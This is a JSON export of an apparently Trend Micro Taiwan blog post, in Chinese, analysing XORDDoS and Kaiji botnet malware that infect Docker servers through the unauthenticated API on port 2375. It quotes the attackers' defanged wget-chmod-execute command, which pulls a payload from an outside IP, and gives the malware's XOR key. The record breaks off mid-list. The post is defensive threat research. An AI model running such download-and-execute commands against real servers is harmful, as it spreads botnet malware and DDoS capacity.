{"id":65049,"date":"2020-06-23T20:34:00","date_gmt":"2020-06-23T12:34:00","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=65049"},"modified":"2020-07-05T20:53:47","modified_gmt":"2020-07-05T12:53:47","slug":"xorddos-%e5%92%8c-kaiji-%e6%ae%ad%e5%b1%8d%e7%b6%b2%e8%b7%af%e7%97%85%e6%af%92%e9%8e%96%e5%ae%9a%e6%9a%b4%e9%9c%b2%e7%9a%84docker%e4%bc%ba%e6%9c%8d%e5%99%a8","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=65049","title":{"rendered":"XORDDoS \u548c Kaiji \u6bad\u5c4d\u7db2\u8def\u75c5\u6bd2\u9396\u5b9a\u66b4\u9732\u7684Docker\u4f3a\u670d\u5668"},"content":{"rendered":"\n

<\/p>\n\n\n\n

\"\"<\/figure><\/div>\n\n\n\n

\u8da8\u52e2\u79d1\u6280<\/a>\u6700\u8fd1\u5075\u6e2c\u5230\u5169\u7a2e\u6703\u653b\u64ca\u66b4\u9732Docker\u4f3a\u670d\u5668\u7684Linux\u6bad\u5c4d\u7db2\u8def\u75c5\u6bd2\uff1b\u5b83\u5011\u662fXORDDoS\u60e1\u610f\u8edf\u9ad4\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70baBackdoor.Linux.XORDDOS.AE<\/a>\uff09\u548cKaiji DDoS\u60e1\u610f\u8edf\u9ad4\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70baDDoS.Linux.KAIJI.A<\/a>\uff09\u3002<\/p>\n\n\n\n

\u5c07Docker\u4f3a\u670d\u5668\u7576\u4f5c\u76ee\u6a19\u662fXORDDoS\u548cKaiji\u7684\u65b0\u767c\u5c55\u3002XORDDoS\u5df2\u77e5\u6703\u653b\u64ca\u96f2\u7aef\u74b0\u5883\u5167\u7684Linux\u4e3b\u6a5f\uff0c\u800c\u6700\u8fd1\u51fa\u73fe\u7684Kaiji\u6700\u521d\u88ab\u767c\u73fe<\/a>\u662f\u91dd\u5c0d\u7269\u806f\u7db2\uff08IoT ,Internet of Thing<\/a>\uff09<\/a><\/ins>\u88dd\u7f6e\u3002\u653b\u64ca\u8005\u901a\u5e38\u6703\u6383\u63cf\u958b\u653e\u7684SSH\u548cTelnet\u7aef\u53e3\uff0c\u518d\u4f86\u7528\u6bad\u5c4d\u7db2\u8def\u9032\u884c\u66b4\u529b\u653b\u64ca\u3002\u73fe\u5728\u5b83\u5011\u6703\u7528\u66b4\u9732\u7aef\u53e32375\u4f86\u641c\u5c0bDocker\u4f3a\u670d\u5668\u3002\u7aef\u53e32375\u662fDocker API\u4f7f\u7528\u7684\u5169\u500b\u7aef\u53e3\u4e4b\u4e00\uff0c\u7528\u65bc\u672a\u52a0\u5bc6\u548c\u7121\u8eab\u4efd\u8a8d\u8b49\u901a\u8a0a<\/a>\u3002<\/p>\n\n\n\n

\u4f46\u9019\u5169\u7a2e\u60e1\u610f\u8edf\u9ad4\u7684\u653b\u64ca\u65b9\u6cd5\u6709\u8457\u986f\u8457\u5dee\u7570\u3002XORDDoS\u653b\u64ca\u6703\u5165\u4fb5Docker\u4f3a\u670d\u5668\u4f86\u611f\u67d3\u6240\u6709\u8a17\u7ba1\u7684\u5bb9\u5668\uff0cKaiji\u5247\u6703\u90e8\u7f72\u81ea\u5df1\u7684\u5bb9\u5668\u4f86\u653eDDoS\u60e1\u610f\u8edf\u9ad4\u3002<\/p>\n\n\n\n

\u9019\u4e9b\u60e1\u610f\u8edf\u9ad4\u53ef\u4ee5\u7528\u4f86\u9032\u884c\u5206\u6563\u5f0f\u963b\u65b7\u670d\u52d9\u653b\u64caHYPERLINK “https:\/\/blog.trendmicro.com.tw\/?p=16497” (DDoS)<\/a>\u653b\u64ca\uff0c\u9019\u662f\u7a2e\u5c01\u9396\u3001\u7834\u58de\u6216\u95dc\u9589\u7db2\u8def\u3001\u7db2\u7ad9\u6216\u670d\u52d9\u7684\u653b\u64ca\u3002\u5229\u7528\u773e\u591a\u7cfb\u7d71\u6240\u7522\u751f\u7684\u6d41\u91cf\u4f86\u7671\u7613\u76ee\u6a19\u7cfb\u7d71\uff0c\u8b93\u5176\u4ed6\u4f7f\u7528\u8005\u7121\u6cd5\u9023\u4e0a\u3002<\/p>\n\n\n\n\n\n\n\n

<\/div>\n\n\n\n

XORDDoS<\/strong>\u60e1\u610f\u8edf\u9ad4\u5206\u6790<\/strong><\/h3>\n\n\n\n


XORDDoS\u611f\u67d3\u93c8\u5f9e\u653b\u64ca\u8005\u641c\u5c0b\u516c\u958bDocker API\u7aef\u53e32375\u7684\u4e3b\u6a5f\u958b\u59cb\u3002\u63a5\u8457\u6703\u9001\u51fa\u547d\u4ee4\u4f86\u5217\u51fa\u8a17\u7ba1\u5728Docker\u4f3a\u670d\u5668\u4e0a\u7684\u5bb9\u5668\u3002\u4e4b\u5f8c\u653b\u64ca\u8005\u6703\u5c0d\u6240\u6709\u7684\u5bb9\u5668\u57f7\u884c\u4e0b\u5217\u547d\u4ee4\uff0c\u7528XORDDoS\u60e1\u610f\u8edf\u9ad4\u611f\u67d3\u6240\u6709\u5bb9\u5668\uff1a<\/p>\n\n\n\n

wget hxxp:\/\/122[.]51[.]133[.]49:10086\/VIP \u2013O VIP chmod 777 VIP .\/VIP<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

XORDDoS\u60e1\u610f\u7a0b\u5f0f\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70baBackdoor.Linux.XORDDOS.AE<\/a>\uff09\u4ecd\u7136\u7528\u4e4b\u524d\u653b\u64ca\u6240\u7528\u7684XOR\u91d1\u9470\uff08BB2FA36AAA9541F0\uff09\u4f86\u52a0\u5bc6\u5b57\u4e32\u53ca\u8ddf\u547d\u4ee4\u548c\u63a7\u5236\uff08C&C\uff09\u4f3a\u670d\u5668\u901a\u8a0a\u3002\u5b83\u9084\u6703\u5728\u6a5f\u5668\u5167\u90e8\u5efa\u7acb\u591a\u500b\u526f\u672c\u4f86\u4f5c\u70ba\u6301\u7e8c\u6027\u6a5f\u5236\u3002<\/p>\n\n\n\n

\"\"\/
\u57161. XORDDoS\u5efa\u7acb\u591a\u500b\u81ea\u8eab\u526f\u672c\u7684\u7a0b\u5f0f\u78bc\u7247\u6bb5<\/figcaption><\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

<\/p>\n\n\n\n

\u60e1\u610f\u7a0b\u5f0f\u6703\u555f\u52d5SYN\u3001ACK\u548cDNS\u985e\u578b\u7684DDoS\u653b\u64ca\u3002<\/p>\n\n\n\n

\"\"\/
\u57162.\u986f\u793aXORDDoS\u53ef\u767c\u52d5DDoS\u653b\u64ca\u985e\u578b\u7684\u7a0b\u5f0f\u78bc\u7247\u6bb5<\/figcaption><\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

<\/p>\n\n\n\n

\u5b83\u9084\u53ef\u4ee5\u4e0b\u8f09\u548c\u57f7\u884c\u66f4\u591a\u60e1\u610f\u8edf\u9ad4\u6216\u9032\u884c\u81ea\u6211\u66f4\u65b0\u3002<\/p>\n\n\n\n

\"\"\/
\u57163. \u986f\u793aXORDDoS\u4e0b\u8f09\u548c\u66f4\u65b0\u6a94\u6848\u80fd\u529b\u7684\u7a0b\u5f0f\u78bc\u7247\u6bb5\u3002<\/figcaption><\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

<\/p>\n\n\n\n

\u5b83\u6703\u6536\u96c6\u4e0b\u5217\u8207\u767c\u52d5DDoS\u653b\u64ca\u6709\u95dc\u7684\u8cc7\u6599\uff1a<\/p>\n\n\n\n